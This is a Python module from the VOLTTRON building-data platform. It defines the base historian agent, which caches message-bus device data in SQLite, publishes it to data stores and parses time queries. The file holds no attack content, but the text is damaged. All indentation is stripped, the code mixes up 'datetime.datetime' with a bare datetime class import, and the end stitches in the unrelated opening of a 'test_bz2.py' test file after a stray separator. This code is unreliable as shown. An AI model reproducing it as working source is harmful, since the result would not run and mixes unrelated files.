# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
"""
=====================
Historian Development
=====================
Support for storing and retrieving historical device and analysis data
published to the message bus is handled with Historian Agents. If a new type
of data store or a new way of storing data is desired a new type of Historian
Agent should created.
Historian Agents are implemented by subclassing :py:class:`BaseHistorian`.
Agents that need short term storage of device data should subscribe to device
data and use internal data structures for storage. Agents which need long
term Historical data that predates the startup of the Agent should interact
with a Historian Agent in order to obtain that data as needed.
While it is possible to create an Agent from scratch which handles gathering
and storing device data it will miss out on the benefits of creating a proper
Historian Agent that subclassing :py:class:`BaseHistorian`. The
:py:class:`BaseHistorian` class provides the following features:
- A separate thread for all communication with a data store removing the need
to use or implement special libraries to work with gevent.
- Automatically subscribe to and process device publishes.
- Automatically backup data retrieved off the message bus to a disk cache.
Cached data will only be removed once it is successfully published to a data
store.
- Existing Agents that publish analytical data for storage or query for
historical data will be able to use the new Historian without any code
changes.
- Data can be graphed in VOLTTRON Central.
Creating a New Historian
------------------------
To create a new Historian create a new Agent that subclasses
:py:class:`BaseHistorian`. :py:class:`BaseHistorian` inherits from
:py:class:`volttron.platform.vip.agent.Agent` so including it in the class
parents is not needed.
The new Agent must implement the following methods:
- :py:meth:`BaseHistorianAgent.publish_to_historian`
- :py:meth:`BaseQueryHistorianAgent.query_topic_list`
- :py:meth:`BaseQueryHistorianAgent.query_historian`
While not required this method may be overridden as needed:
- :py:meth:`BaseHistorianAgent.historian_setup`
Optionally a Historian Agent can inherit from :py:class:`BaseHistorianAgent`
instead of :py:class:`BaseHistorian` if support for querying data is not
needed for the data store. If this route is taken then VOLTTRON Central
will not be able to graph data from the store. It is possible to run more than
one Historian agent at a time to store data in more than one place. If needed
one can be used to allow querying while another is used to put data in the
desired store that does not allow querying.
Historian Execution Flow
------------------------
At startup the :py:class:`BaseHistorian` class starts a new thread to handle
all data caching and publishing (the publishing thread). The main thread then
subscribes to all Historian related topics on the message bus. Whenever
subscribed data comes in it is published to a Queue to be be processed by the
publishing thread as soon as possible.
At startup the publishing thread calls
:py:meth:`BaseHistorianAgent.historian_setup` to give the implemented
Historian a chance to setup any connections in the thread.
The process thread then enters the following logic loop:
::
Wait for data to appear in the Queue. Proceed if data appears or a
`retry_period` time elapses.
If new data appeared in Queue:
Save new data to cache.
While data is in cache:
Publish data to store by calling
:py:meth:`BaseHistorianAgent.publish_to_historian`.
If no data was published:
Go back to start and check Queue for data.
Remove published data from cache.
If we have been publishing for `max_time_publishing`:
Go back to start and check Queue for data.
The logic will also forgo waiting the `retry_period` for new data to appear
when checking for new data if publishing has been successful and there is
still data in the cache to be publish.
Storing Data
------------
The :py:class:`BaseHistorian` will call
:py:meth:`BaseHistorianAgent.publish_to_historian` as the time series data
becomes available. Data is batched in a groups up to `submit_size_limit`.
After processing the list or individual items in the list
:py:meth:`BaseHistorianAgent.publish_to_historian` must call
:py:meth:`BaseHistorianAgent.report_handled` to report an individual point
of data was published or :py:meth:`BaseHistorianAgent.report_all_handled` to
report that everything from the batch was successfully published. This tells
the :py:class:`BaseHistorianAgent` class what to remove from the cache and if
any publishing was successful.
The `to_publish_list` argument of
:py:meth:`BaseHistorianAgent.publish_to_historian` is a list of records that
takes the following form:
.. code-block:: python
[
{
'_id': 1,
'timestamp': timestamp1.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/thermostat",
'value': 73.0,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
{
'_id': 2,
'timestamp': timestamp2.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/temperature",
'value': 74.1,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
...
]
As records are published to the data store
:py:meth:`BaseHistorianAgent.publish_to_historian` must call
:py:meth:`BaseHistorianAgent.report_handled` with the record or list of
records that was published or :py:meth:`BaseHistorianAgent.report_all_handled`
if everything was published.
Querying Data
-------------
When an request is made to query data the
:py:meth:`BaseQueryHistorianAgent.query_historian` method is called.
When a request is made for the list of topics in the store
:py:meth:`BaseQueryHistorianAgent.query_topic_list`
will be called.
Other Notes
-----------
Implemented Historians must be tolerant to receiving the same data for
submission twice. While very rare, it is possible for a Historian to be
forcibly shutdown after data is published but before it is removed from the
cache. When restarted the :py:class:`BaseHistorian` will submit
the same date over again.
"""
from __future__ import absolute_import, print_function
from abc import abstractmethod
from dateutil.parser import parse
import logging
import re
import sqlite3
from Queue import Queue, Empty
from collections import defaultdict
from datetime import datetime, timedelta
import threading
from threading import Thread
import weakref
import pytz
from zmq.utils import jsonapi
from volttron.platform.agent.utils import process_timestamp, \
fix_sqlite3_datetime, get_aware_utc_now
from volttron.platform.messaging import topics, headers as headers_mod
from volttron.platform.vip.agent import *
from volttron.platform.vip.agent import compat
_log = logging.getLogger(__name__)
ACTUATOR_TOPIC_PREFIX_PARTS = len(topics.ACTUATOR_VALUE.split('/'))
ALL_REX = re.compile('.*/all$')
# Register a better datetime parser in sqlite3.
fix_sqlite3_datetime()
class BaseHistorianAgent(Agent):
"""This is the base agent for historian Agents.
It automatically subscribes to all device publish topics.
Event processing occurs in its own thread as to not block the main
thread. Both the historian_setup and publish_to_historian happen in
the same thread.
By default the base historian will listen to 4 separate root topics (
datalogger/*, record/*, actuators/*, and device/*. Messages that are
published to actuator are assumed to be part of the actuation process.
Messages published to datalogger will be assumed to be timepoint data that
is composed of units and specific types with the assumption that they have
the ability to be graphed easily. Messages published to devices
are data that comes directly from drivers. Finally Messages that are
published to record will be handled as string data and can be customized
to the user specific situation.
This base historian will cache all received messages to a local database
before publishing it to the historian. This allows recovery for
unexpected happenings before the successful writing of data to the
historian.
"""
def __init__(self,
retry_period=300.0,
submit_size_limit=1000,
max_time_publishing=30,
backup_storage_limit_gb=None,
topic_replace_list=None,
**kwargs):
super(BaseHistorianAgent, self).__init__(**kwargs)
# This should resemble a dictionary that has key's from and to which
# will be replaced within the topics before it's stored in the
# cache database
self._topic_replace_list = topic_replace_list
_log.info('Topic string replace list: {}'
.format(self._topic_replace_list))
self._backup_storage_limit_gb = backup_storage_limit_gb
self._started = False
self._retry_period = retry_period
self._submit_size_limit = submit_size_limit
self._max_time_publishing = timedelta(seconds=max_time_publishing)
self._successful_published = set()
self._topic_replace_map = {}
self._event_queue = Queue()
self._process_thread = Thread(target=self._process_loop)
self._process_thread.daemon = True # Don't wait on thread to exit.
self._process_thread.start()
def _create_subscriptions(self):
subscriptions = [
(topics.DRIVER_TOPIC_BASE, self._capture_device_data),
(topics.LOGGER_BASE, self._capture_log_data),
(topics.ACTUATOR, self._capture_actuator_data),
(topics.ANALYSIS_TOPIC_BASE, self._capture_analysis_data),
(topics.RECORD, self._capture_record_data)
]
for prefix, cb in subscriptions:
_log.debug("subscribing to {}".format(prefix))
self.vip.pubsub.subscribe(peer='pubsub',
prefix=prefix,
callback=cb)
@Core.receiver("onstart")
def starting_base(self, sender, **kwargs):
"""
Subscribes to the platform message bus on the actuator, record,
datalogger, and device topics to capture data.
"""
_log.debug("Starting base historian")
self._create_subscriptions()
self._started = True
self.vip.heartbeat.start()
@Core.receiver("onstop")
def stopping(self, sender, **kwargs):
"""
Release subscription to the message bus because we are no longer able
to respond to messages now.
"""
try:
# unsubscribes to all topics that we are subscribed to.
self.vip.pubsub.unsubscribe(peer='pubsub', prefix=None,
callback=None)
except KeyError:
# means that the agent didn't start up properly so the pubsub
# subscriptions never got finished.
pass
def _get_topic(self, input_topic):
output_topic = input_topic
# Only if we have some topics to replace.
if self._topic_replace_list:
# if we have already cached the topic then return it.
if input_topic in self._topic_replace_map.keys():
output_topic = self._topic_replace_map[input_topic]
else:
self._topic_replace_map[input_topic] = input_topic
temptopics = {}
for x in self._topic_replace_list:
if x['from'] in input_topic:
# this allows multiple things to be replaced from
# from a given topic.
new_topic = temptopics.get(input_topic, input_topic)
temptopics[input_topic] = new_topic.replace(
x['from'], x['to'])
for k, v in temptopics.items():
self._topic_replace_map[k] = v
output_topic = self._topic_replace_map[input_topic]
return output_topic
def _capture_record_data(self, peer, sender, bus, topic, headers,
message):
_log.debug('Capture record data {}'.format(message))
# Anon the topic if necessary.
topic = self._get_topic(topic)
timestamp_string = headers.get(headers_mod.DATE, None)
timestamp = get_aware_utc_now()
if timestamp_string is not None:
timestamp, my_tz = process_timestamp(timestamp_string, topic)
if sender == 'pubsub.compat':
message = compat.unpack_legacy_message(headers, message)
self._event_queue.put(
{'source': 'record',
'topic': topic,
'readings': [(timestamp, message)],
'meta': {}})
def _capture_log_data(self, peer, sender, bus, topic, headers, message):
"""Capture log data and submit it to be published by a historian."""
# Anon the topic if necessary.
topic = self._get_topic(topic)
try:
# 2.0 agents compatability layer makes sender == pubsub.compat so
# we can do the proper thing when it is here
if sender == 'pubsub.compat':
data = compat.unpack_legacy_message(headers, message)
else:
data = message
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
source = 'log'
_log.debug(
"Queuing {topic} from {source} for publish".format(topic=topic,
source=source))
for point, item in data.iteritems():
# ts_path = location + '/' + point
if 'Readings' not in item or 'Units' not in item:
_log.error("logging request for {topic} missing Readings "
"or Units".format(topic=topic))
continue
units = item['Units']
dtype = item.get('data_type', 'float')
tz = item.get('tz', None)
if dtype == 'double':
dtype = 'float'
meta = {'units': units, 'type': dtype}
readings = item['Readings']
if not isinstance(readings, list):
readings = [(get_aware_utc_now(), readings)]
elif isinstance(readings[0], str):
my_ts, my_tz = process_timestamp(readings[0], topic)
readings = [(my_ts, readings[1])]
if tz:
meta['tz'] = tz
elif my_tz:
meta['tz'] = my_tz
self._event_queue.put({'source': source,
'topic': topic + '/' + point,
'readings': readings,
'meta': meta})
def _capture_device_data(self, peer, sender, bus, topic, headers,
message):
"""Capture device data and submit it to be published by a historian.
Filter out only the */all topics for publishing to the historian.
"""
if not ALL_REX.match(topic):
_log.debug("Unmatched topic: {}".format(topic))
return
# Anon the topic if necessary.
topic = self._get_topic(topic)
# Because of the above if we know that all is in the topic so
# we strip it off to get the base device
parts = topic.split('/')
device = '/'.join(parts[1:-1]) # '/'.join(reversed(parts[2:]))
_log.debug("found topic {}".format(topic))
self._capture_data(peer, sender, bus, topic, headers, message, device)
def _capture_analysis_data(self, peer, sender, bus, topic, headers,
message):
"""Capture analaysis data and submit it to be published by a historian.
Filter out all but the all topics
"""
# Anon the topic.
topic = self._get_topic(topic)
# topic now is going to always end in all.
if not topic.endswith('/'):
topic += '/'
if not topic.endswith('all'):
topic += 'all'
parts = topic.split('/')
# strip off the first part of the topic.
device = '/'.join(parts[1:-1])
self._capture_data(peer, sender, bus, topic, headers, message, device)
def _capture_data(self, peer, sender, bus, topic, headers, message,
device):
# Anon the topic if necessary.
topic = self._get_topic(topic)
timestamp_string = headers.get(headers_mod.DATE, None)
timestamp = get_aware_utc_now()
if timestamp_string is not None:
timestamp, my_tz = process_timestamp(timestamp_string, topic)
try:
_log.debug(
"### In capture_data Actual message {} ".format(message))
# 2.0 agents compatability layer makes sender == pubsub.compat so
# we can do the proper thing when it is here
if sender == 'pubsub.compat':
# message = jsonapi.loads(message[0])
message = compat.unpack_legacy_message(headers, message)
if isinstance(message, dict):
values = message
else:
values = message[0]
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
except Exception as e:
_log.exception(e)
return
meta = {}
if not isinstance(message, dict):
meta = message[1]
if topic.startswith('analysis'):
source = 'analysis'
else:
source = 'scrape'
_log.debug(
"Queuing {topic} from {source} for publish".format(topic=topic,
source=source))
for key, value in values.iteritems():
point_topic = device + '/' + key
self._event_queue.put({'source': source,
'topic': point_topic,
'readings': [(timestamp, value)],
'meta': meta.get(key, {})})
def _capture_actuator_data(self, topic, headers, message, match):
"""Capture actuation data and submit it to be published by a historian.
"""
# Anon the topic if necessary.
topic = self._get_topic(topic)
timestamp_string = headers.get('time')
if timestamp_string is None:
_log.error(
"message for {topic} missing timetamp".format(topic=topic))
return
try:
timestamp = parse(timestamp_string)
except (ValueError, TypeError) as e:
_log.error("message for {} bad timetamp string: "
"{}".format(topic, timestamp_string))
return
parts = topic.split('/')
topic = '/'.join(parts[ACTUATOR_TOPIC_PREFIX_PARTS:])
try:
value = message[0]
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
source = 'actuator'
_log.debug(
"Queuing {topic} from {source} for publish".format(topic=topic,
source=source))
self._event_queue.put({'source': source,
'topic': topic,
'readings': [timestamp, value],
'meta': {}})
def _process_loop(self):
"""
The process loop is called off of the main thread and will not exit
unless the main agent is shutdown.
"""
_log.debug("Starting process loop.")
backupdb = BackupDatabase(self, self._backup_storage_limit_gb)
# Sets up the concrete historian
self.historian_setup()
# now that everything is setup we need to make sure that the topics
# are synchronized between
# Based on the state of the back log and whether or not successful
# publishing is currently happening (and how long it's taking)
# we may or may not want to wait on the event queue for more input
# before proceeding with the rest of the loop.
wait_for_input = not bool(
backupdb.get_outstanding_to_publish(self._submit_size_limit))
while True:
try:
_log.debug("Reading from/waiting for queue.")
new_to_publish = [
self._event_queue.get(wait_for_input, self._retry_period)]
except Empty:
_log.debug("Queue wait timed out. Falling out.")
new_to_publish = []
if new_to_publish:
_log.debug("Checking for queue build up.")
while True:
try:
new_to_publish.append(self._event_queue.get_nowait())
except Empty:
break
backupdb.backup_new_data(new_to_publish)
wait_for_input = True
start_time = datetime.utcnow()
_log.debug("Calling publish_to_historian.")
while True:
to_publish_list = backupdb.get_outstanding_to_publish(
self._submit_size_limit)
if not to_publish_list or not self._started:
break
try:
self.publish_to_historian(to_publish_list)
except Exception as exp:
_log.exception(
"An unhandled exception occured while publishing.")
# if the successful queue is empty then we need not remove
# them from the database.
if not self._successful_published:
break
backupdb.remove_successfully_published(
self._successful_published, self._submit_size_limit)
self._successful_published = set()
now = datetime.utcnow()
if now - start_time > self._max_time_publishing:
wait_for_input = False
break
_log.debug("Finished processing")
def report_handled(self, record):
"""
Call this from :py:meth:`BaseHistorianAgent.publish_to_historian` to report a record or
list of records has been successfully published and should be removed from the cache.
:param record: Record or list of records to remove from cache.
:type record: dict or list
"""
if isinstance(record, list):
for x in record:
self._successful_published.add(x['_id'])
else:
self._successful_published.add(record['_id'])
def report_all_handled(self):
"""
Call this from :py:meth:`BaseHistorianAgent.publish_to_historian` to report that all records
passed to :py:meth:`BaseHistorianAgent.publish_to_historian` have been successfully published
and should be removed from the cache.
"""
self._successful_published.add(None)
@abstractmethod
def publish_to_historian(self, to_publish_list):
"""
Main publishing method for historian Agents.
:param to_publish_list: List of records
:type to_publish_list: list
to_publish_list takes the following form:
.. code-block:: python
[
{
'_id': 1,
'timestamp': timestamp1.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/thermostat",
'value': 73.0,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
{
'_id': 2,
'timestamp': timestamp2.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/temperature",
'value': 74.1,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
...
]
The contents of `meta` is not consistent. The keys in the meta data values can be different and can
change along with the values of the meta data. It is safe to assume that the most recent value of
the "meta" dictionary are the only values that are relevant. This is the way the cache
treats meta data.
Once one or more records are published either :py:meth:`BaseHistorianAgent.report_handled` or
:py:meth:`BaseHistorianAgent.report_handled` must be called to report records as being published.
"""
def historian_setup(self):
"""Optional setup routine, run in the processing thread before
main processing loop starts. Gives the Historian a chance to setup
connections in the publishing thread.
"""
class BackupDatabase:
"""
A creates and manages backup cache for the
:py:class:`BaseHistorianAgent` class.
Historian implementors do not need to use this class. It is for internal
use only.
"""
def __init__(self, owner, backup_storage_limit_gb):
# The topic cache is only meant as a local lookup and should not be
# accessed via the implemented historians.
self._backup_cache = {}
self._meta_data = defaultdict(dict)
self._owner = weakref.ref(owner)
self._backup_storage_limit_gb = backup_storage_limit_gb
self._setupdb()
def backup_new_data(self, new_publish_list):
"""
:param new_publish_list: A list of records to cache to disk.
:type new_publish_list: list
"""
_log.debug("Backing up unpublished values.")
c = self._connection.cursor()
if self._backup_storage_limit_gb is not None:
def page_count():
c.execute("PRAGMA page_count")
return c.fetchone()[0]
while page_count() >= self.max_pages:
self._owner().vip.pubsub.publish('pubsub', 'backupdb/nomore')
c.execute(
'''DELETE FROM outstanding
WHERE ROWID IN
(SELECT ROWID FROM outstanding
ORDER BY ROWID ASC LIMIT 100)''')
for item in new_publish_list:
source = item['source']
topic = item['topic']
meta = item.get('meta', {})
values = item['readings']
topic_id = self._backup_cache.get(topic)
if topic_id is None:
c.execute('''INSERT INTO topics values (?,?)''',
(None, topic))
c.execute('''SELECT last_insert_rowid()''')
row = c.fetchone()
topic_id = row[0]
self._backup_cache[topic_id] = topic
self._backup_cache[topic] = topic_id
meta_dict = self._meta_data[(source, topic_id)]
for name, value in meta.iteritems():
current_meta_value = meta_dict.get(name)
if current_meta_value != value:
c.execute('''INSERT OR REPLACE INTO metadata
values(?, ?, ?, ?)''',
(source, topic_id, name, value))
meta_dict[name] = value
for timestamp, value in values:
if timestamp is None:
timestamp = get_aware_utc_now()
_log.debug("Inserting into outstanding table with timestamp "
"{}".format(timestamp))
c.execute(
'''INSERT OR REPLACE INTO outstanding
values(NULL, ?, ?, ?, ?)''',
(timestamp, source, topic_id, jsonapi.dumps(value)))
self._connection.commit()
def remove_successfully_published(self, successful_publishes,
submit_size):
"""
Removes the reported successful publishes from the backup database.
If None is found in `successful_publishes` we assume that everything
was published.
:param successful_publishes: List of records that was published.
:param submit_size: Number of things requested from previous call to :py:meth:`get_outstanding_to_publish`.
:type successful_publishes: list
:type submit_size: int
"""
_log.debug("Cleaning up successfully published values.")
c = self._connection.cursor()
if None in successful_publishes:
c.execute('''DELETE FROM outstanding
WHERE ROWID IN
(SELECT ROWID FROM outstanding
ORDER BY ts LIMIT ?)''', (submit_size,))
else:
temp = list(successful_publishes)
temp.sort()
c.executemany('''DELETE FROM outstanding
WHERE id = ?''',
((_id,) for _id in
successful_publishes))
self._connection.commit()
def get_outstanding_to_publish(self, size_limit):
"""
Retrieve up to `size_limit` records from the cache.
:param size_limit: Max number of records to retrieve.
:type size_limit: int
:returns: List of records for publication.
:rtype: list
"""
_log.debug("Getting oldest outstanding to publish.")
c = self._connection.cursor()
c.execute('select * from outstanding order by ts limit ?',
(size_limit,))
results = []
for row in c:
_id = row[0]
timestamp = row[1]
source = row[2]
topic_id = row[3]
value = jsonapi.loads(row[4])
meta = self._meta_data[(source, topic_id)].copy()
results.append({'_id': _id,
'timestamp': timestamp.replace(tzinfo=pytz.UTC),
'source': source,
'topic': self._backup_cache[topic_id],
'value': value,
'meta': meta})
c.close()
return results
def _setupdb(self):
""" Creates a backup database for the historian if doesn't exist."""
_log.debug("Setting up backup DB.")
self._connection = sqlite3.connect(
'backup.sqlite',
detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)
c = self._connection.cursor()
if self._backup_storage_limit_gb is not None:
c.execute('''PRAGMA page_size''')
page_size = c.fetchone()[0]
max_storage_bytes = self._backup_storage_limit_gb * 1024 ** 3
self.max_pages = max_storage_bytes / page_size
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='outstanding';")
if c.fetchone() is None:
_log.debug("Configuring backup BD for the first time.")
self._connection.execute('''PRAGMA auto_vacuum = FULL''')
self._connection.execute('''CREATE TABLE outstanding
(id INTEGER PRIMARY KEY,
ts timestamp NOT NULL,
source TEXT NOT NULL,
topic_id INTEGER NOT NULL,
value_string TEXT NOT NULL,
UNIQUE(ts, topic_id, source))''')
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='metadata';")
if c.fetchone() is None:
self._connection.execute('''CREATE TABLE metadata
(source TEXT NOT NULL,
topic_id INTEGER NOT NULL,
name TEXT NOT NULL,
value TEXT NOT NULL,
UNIQUE(topic_id, source, name))''')
else:
c.execute("SELECT * FROM metadata")
for row in c:
self._meta_data[(row[0], row[1])][row[2]] = row[3]
c.execute("SELECT name FROM sqlite_master WHERE type='table' "
"AND name='topics';")
if c.fetchone() is None:
self._connection.execute('''create table topics
(topic_id INTEGER PRIMARY KEY,
topic_name TEXT NOT NULL,
UNIQUE(topic_name))''')
else:
c.execute("SELECT * FROM topics")
for row in c:
self._backup_cache[row[0]] = row[1]
self._backup_cache[row[1]] = row[0]
c.close()
self._connection.commit()
class BaseQueryHistorianAgent(Agent):
"""This is the base agent for historian Agents that support querying of
their data stores.
"""
@RPC.export
def query(self, topic=None, start=None, end=None, skip=0,
count=None, order="FIRST_TO_LAST"):
"""RPC call
Call this method to query an Historian for time series data.
:param topic: Topic to query for.
:param start: Start time of the query. Defaults to None which is the beginning of time.
:param end: End time of the query. Defaults to None which is the end of time.
:param skip: Skip this number of results.
:param count: Limit results to this value.
:param order: How to order the results, either "FIRST_TO_LAST" or "LAST_TO_FIRST"
:type topic: str
:type start: str
:type end: str
:type skip: int
:type count: int
:type order: str
:return: Results of the query
:rtype: dict
Return values will have the following form:
.. code-block:: python
{
"values": [(<timestamp string1>: value1),
(<timestamp string2>: value2),
...],
"metadata": {"key1": value1,
"key2": value2,
...}
}
The string arguments can be either the output from
:py:func:`volttron.platform.agent.utils.format_timestamp` or the special string "now".
Times relative to "now" may be specified with a relative time string using
the Unix "at"-style specifications. For instance "now -1h" will specify one hour ago.
"now -1d -1h -20m" would specify 25 hours and 20 minutes ago.
"""
if topic is None:
raise TypeError('"Topic" required')
if start is not None:
try:
start = parse(start)
except TypeError:
start = time_parser.parse(start)
if end is not None:
try:
end = parse(end)
except TypeError:
end = time_parser.parse(end)
if start:
_log.debug("start={}".format(start))
results = self.query_historian(topic, start, end, skip, count, order)
metadata = results.get("metadata", None)
values = results.get("values", None)
if values is not None and metadata is None:
results['metadata'] = {}
return results
@RPC.export
def get_topic_list(self):
"""RPC call
:return: List of topics in the data store.
:rtype: list
"""
return self.query_topic_list()
@abstractmethod
def query_topic_list(self):
"""
This function is called by :py:meth:`BaseQueryHistorianAgent.get_topic_list`
to actually topic list from the data store.
:return: List of topics in the data store.
:rtype: list
"""
@abstractmethod
def query_historian(self, topic, start=None, end=None, skip=0, count=None,
order=None):
"""
This function is called by :py:meth:`BaseQueryHistorianAgent.query`
to actually query the data store
and must return the results of a query in the form:
.. code-block:: python
{
"values": [(timestamp1: value1),
(timestamp2: value2),
...],
"metadata": {"key1": value1,
"key2": value2,
...}
}
Timestamps must be strings formatted by
:py:func:`volttron.platform.agent.utils.format_timestamp`.
"metadata" is not required. The caller will normalize this to {} for you if it is missing.
:param topic: Topic to query for.
:param start: Start of query timestamp as a datetime.
:param end: End of query timestamp as a datetime.
:param skip: Skip this number of results.
:param count: Limit results to this value.
:param order: How to order the results, either "FIRST_TO_LAST" or "LAST_TO_FIRST"
:type topic: str
:type start: datetime
:type end: datetime
:type skip: int
:type count: int
:type order: str
:return: Results of the query
:rtype: dict
"""
class BaseHistorian(BaseHistorianAgent, BaseQueryHistorianAgent):
def __init__(self, **kwargs):
_log.debug('Constructor of BaseHistorian thread: {}'.format(
threading.currentThread().getName()
))
super(BaseHistorian, self).__init__(**kwargs)
# The following code is
# Copyright (c) 2011, 2012, Regents of the University of California
# and is under the same licence as the remainder of the code in this file.
# Modification were made to remove unneeded pieces and to fit with the
# intended use.
import ply.lex as lex
import ply.yacc as yacc
from dateutil.tz import gettz, tzlocal
local = tzlocal()
def now(tzstr='UTC'):
"""Returns an aware datetime object with the current time in
tzstr timezone"""
if tzstr == 'Local':
tz = local
else:
tz = gettz(tzstr)
return datetime.datetime.now(tz)
def strptime_tz(str, format='%x %X', tzstr='Local'):
"""Returns an aware datetime object. tzstr is a timezone string such as
'US/Pacific' or 'Local' by default which uses the local timezone.
"""
dt = datetime.datetime.strptime(str, format)
if tzstr == 'Local':
tz = local
else:
tz = gettz(tzstr)
return dt.replace(tzinfo=tz)
tokens = ('NOW', "QSTRING", 'LVALUE', 'NUMBER')
reserved = {
'now': 'NOW'}
literals = '()[]*^.,<>=+-/'
time_units = re.compile('^(d|days?|h|hours?|m|minutes?|s|seconds?)$')
def get_timeunit(t):
if not time_units.match(t):
raise ValueError("Invalid timeunit: %s" % t)
if t.startswith('d'):
return 'days'
elif t.startswith('h'):
return 'hours'
elif t.startswith('m'):
return 'minutes'
elif t.startswith('s'):
return 'seconds'
def t_QSTRING(t):
r"""("[^"\\]*?(\\.[^"\\]*?)*?")|(\'[^\'\\]*?(\\.[^\'\\]*?)*?\')"""
if t.value[0] == '"':
t.value = t.value[1:-1].replace('\\"', '"')
elif t.value[0] == "'":
t.value = t.value[1:-1].replace("\\'", "'")
return t
def t_LVALUE(t):
r"""[a-zA-Z\~\$\_][a-zA-Z0-9\/\%_\-]*"""
t.type = reserved.get(t.value, 'LVALUE')
return t
def t_NUMBER(t):
r"""([+-]?([0-9]*\.)?[0-9]+)"""
if '.' in t.value:
try:
t.value = float(t.value)
except ValueError:
print("Invalid floating point number", t.value)
t.value = 0
else:
try:
t.value = int(t.value)
except ValueError:
print("Integer value too large %d", t.value)
t.value = 0
return t
is_number = lambda x: isinstance(x, int) or isinstance(x, float)
t_ignore = " \t"
def t_newline(t):
r"""[\n\r]+"""
t.lexer.lineno += t.value.count("\n")
def t_error(t):
raise ValueError("Syntax Error in Query")
# print("Illegal character '%s'" % t.value[0])
# t.lexer.skip(1)
smapql_lex = lex.lex()
TIMEZONE_PATTERNS = [
"%m/%d/%Y",
"%m/%d/%Y %H:%M",
"%Y-%m-%dT%H:%M:%S",
"%Y-%m-%dT%H:%M:%S.%f",
]
def parse_time(ts):
for pat in TIMEZONE_PATTERNS:
try:
return strptime_tz(ts, pat)
except ValueError:
continue
raise ValueError("Invalid time string:" + ts)
def p_query_pair(t):
"""query : '(' timeref ',' timeref ')' """
t[0] = (t[2], t[4])
def p_query_single(t):
"""query : timeref """
t[0] = t[1]
# an absolute time reference. can be a unix timestamp, a date string,
# or "now"
def p_timeref(t):
"""timeref : abstime
| abstime reltime"""
t[0] = t[1]
if len(t) == 2:
ref = t[1]
else:
ref = t[1] + t[2]
t[0] = ref
def p_abstime(t):
"""abstime : NUMBER
| QSTRING
| NOW"""
if t[1] == 'now':
t[0] = now()
elif type(t[1]) == type(''):
t[0] = parse_time(t[1])
else:
t[0] = datetime.datetime.utcfromtimestamp(t[1] / 1000)
def p_reltime(t):
"""reltime : NUMBER LVALUE
| NUMBER LVALUE reltime"""
timeunit = get_timeunit(t[2])
delta = datetime.timedelta(**{timeunit: t[1]})
if len(t) == 3:
t[0] = delta
else:
t[0] = t[3] + delta
# Error rule for syntax errors
def p_error(p):
raise ValueError("Syntax Error in Query")
# Build the parser
time_parser = yacc.yacc(write_tables=0)
|
test_bz2.py
|
#!/usr/bin/env python
from test import test_support
from test.test_support import TESTFN, import_module
import unittest
from cStringIO import StringIO
import os
import subprocess
import sys
try:
import threading
except ImportError:
threading = None
bz2 = import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = sys.platform not in ("win32", "os2emx", "riscos")
class BaseTest(unittest.TestCase):
"Base for other testcases."
